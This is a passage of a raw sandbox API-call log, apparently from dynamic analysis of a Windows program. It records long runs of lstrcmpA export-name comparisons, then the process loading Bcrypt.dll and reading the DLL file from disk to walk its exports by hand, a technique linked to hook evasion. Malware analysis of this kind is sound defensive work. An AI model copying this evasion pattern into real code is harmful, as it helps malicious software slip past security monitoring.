returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.961] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.962] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0105.963] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0105.963] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0105.963] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0105.963] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.963] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0105.964] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0105.964] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0105.964] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0105.964] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.964] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0105.965] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0105.966] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0105.966] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0105.966] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0105.966] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0105.966] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0105.966] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0105.966] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0105.966] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0106.257] GetProcessHeap () returned 0x430000 [0106.257] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4117040 | out: hHeap=0x430000) returned 1 [0107.108] GetProcessHeap () returned 0x430000 [0107.108] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449160 [0107.108] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0107.115] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0107.115] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0107.115] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0107.115] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0107.115] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0107.115] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0107.115] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0107.115] GetProcessHeap () returned 0x430000 [0107.115] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x26fa0) returned 0x2d52010 [0107.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0107.117] ReadFile (in: hFile=0x15c, lpBuffer=0x2d52010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d52010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0107.120] CloseHandle (hObject=0x15c) returned 1 [0107.120] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0107.120] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0107.120] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0107.120] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0107.120] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.120] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0107.120] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0107.121] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0107.121] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0107.121] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0107.121] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0107.121] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0107.121] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0107.121] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0107.121] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 